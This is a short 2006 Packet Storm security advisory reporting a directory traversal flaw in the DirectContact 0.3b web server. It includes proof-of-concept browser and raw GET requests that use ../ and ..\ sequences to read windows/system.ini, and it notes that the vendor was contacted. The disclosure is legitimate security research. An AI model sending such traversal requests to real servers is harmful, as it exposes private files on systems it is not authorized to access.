directContact03b.txt

2006-03-02T00:00:00
ID PACKETSTORM:44281
Type packetstorm
Reporter Donato Ferrante
Modified 2006-03-02T00:00:00

Description

                                        
                                            ` Donato Ferrante  
  
  
Application: DirectContact  
http://reyero.info/dc/  
  
Version: 0.3b  
  
Bug: directory traversal  
  
Date: 27-Feb-2006  
  
Author: Donato Ferrante  
e-mail: fdonato@autistici.org  
web: www.autistici.org/fdonato  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
1. Description  
2. The bug  
3. The code  
4. The fix  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
----------------  
1. Description:  
----------------  
  
Vendor's Description:  
  
"DirectContact turns your computer in real "friendly" HTTP server."  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
2. The bug:  
------------  
  
The program is unable to manage malicious patterns like ..\ or ../.  
So an attacker can go out the document root assigned to the webserver  
and see/download all the files available on the remote system.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
3. The code:  
-------------  
  
To test the vulnerability:  
  
via browser:  
http://[host]:[port]/..\..\..\..\windows/system.ini  
  
via raw request:  
GET /../../../../../../windows/system.ini HTTP/1.1  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
4. The fix:  
------------  
  
Vendor has been contacted.  
Bug will be fixed in the next release.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
`